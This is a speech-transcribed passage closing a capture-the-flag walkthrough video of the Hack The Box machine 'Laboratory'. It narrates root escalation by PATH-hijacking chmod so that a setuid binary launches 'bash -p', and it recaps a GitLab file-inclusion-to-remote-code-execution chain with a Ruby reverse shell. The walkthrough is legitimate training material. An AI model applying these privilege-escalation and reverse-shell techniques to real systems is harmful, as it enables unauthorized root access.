i'm in a sub shell of bash but because i don't have a set uid bit set that tac p argument isn't going to do anything so i'll exit out of this and i'm just back to my original shell i was in a sub shell for that for that very single line but if i were to now say okay let's set my path to the temporary directory with the value of path just following it and then i were to try and run chmod that command has the context following it okay now we're going to run the chmod out of temp rather than the original chmod out of user bin or wherever that actual binary is genuinely stored so with that we can go ahead and use that user local bin docker security and it will run our ch mod that will maintain that set uid bit that tac p argument we're passing to bash and invoke bash as root because we've kept that set uid privilege so now obviously we're root and that's that uh a lot of time i spent kind of banging my head against the wall when this one i think the lesson learned was just really looking through that list um and as i mentioned sometimes we kind of get caught up in lin peas because it shows us all those nice color coding and we get distracted and all we care about is looking for that don't forget about those ones and maybe even looking manually can still i don't know ground you to look at some of the oddballs that just don't don't always fit so there we go we've rooted the box and that is the end of laboratory from hack the box or laboratory don't forget that oh so i don't know uh i that was the first time i did some of those cool stuff with gitlab i think it's incredible to see this vulnerability and kind of leveraging that local file inclusion technique to get your remote code execution this was very cool i didn't originally get this to work and i was trying with the metasploit version the meta version wasn't working um once i finally got that ruby reverse shell and figured out how to do that i thought that was kind of neat so that's that's definitely some good notes for me to take into account and to see later on so um i hope those were some cool takeaways for you and i'm really glad to maybe finally do something a little bit more with hack the box because i know i don't give them as much love as i nearly should but hopefully we can do a heck of a lot more so some neat tricks use an up dog using uh and you of course if you wanted to you could connect to this thing with pwncat like do i have uh pumpkin installed let's activate that environment um let's run what branch am i on i want to make sure i'm not on the new development okay good so python attack m phone cat tac i that was in home john ctf uh hack the box laboratory ssh dexter okay um dexter at that laboratory.hack the box and i do not apparently have that set up and installed correctly so that was a fluke we'll edit that out i was using um revshells.com to be able to grab some of that uh reverse shell syntax that's kind of uh zero day uh ryan montgomery over in the try hack me space but he's putting out really cool stuff and this is a really handy reference but uh first time i'd ever heard of this video hacks guy looks like he has a lot of other interesting videos that showcase some other exploits and stuff you can do with it so that might be kind of a cool reference a lot of stuff uh really good for me to uh finally walk through this box but man i have been yapping for quite some time so i think that's the end of the video thank you guys so so much for watching i really hope you did get something good out of this one and maybe maybe i can get back to some hack the box stuff again i super appreciate all the swag thank you guys and i'm so looking forward to that cyber apocalypse ctf getting started on monday so hey you should go play go register i hope to see you on the scoreboard thanks so much everybody please do like the video please do all those youtube algorithm things and i'll see in the next video bye [Music] [Music] [Music] you
Info
Channel: John Hammond
Views: 56,342
Rating: undefined out of 5
Keywords:
Id: PgQyuogGgPI
Channel Id: undefined
Length: 73min 43sec (4423 seconds)
Published: Sat Apr 17 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.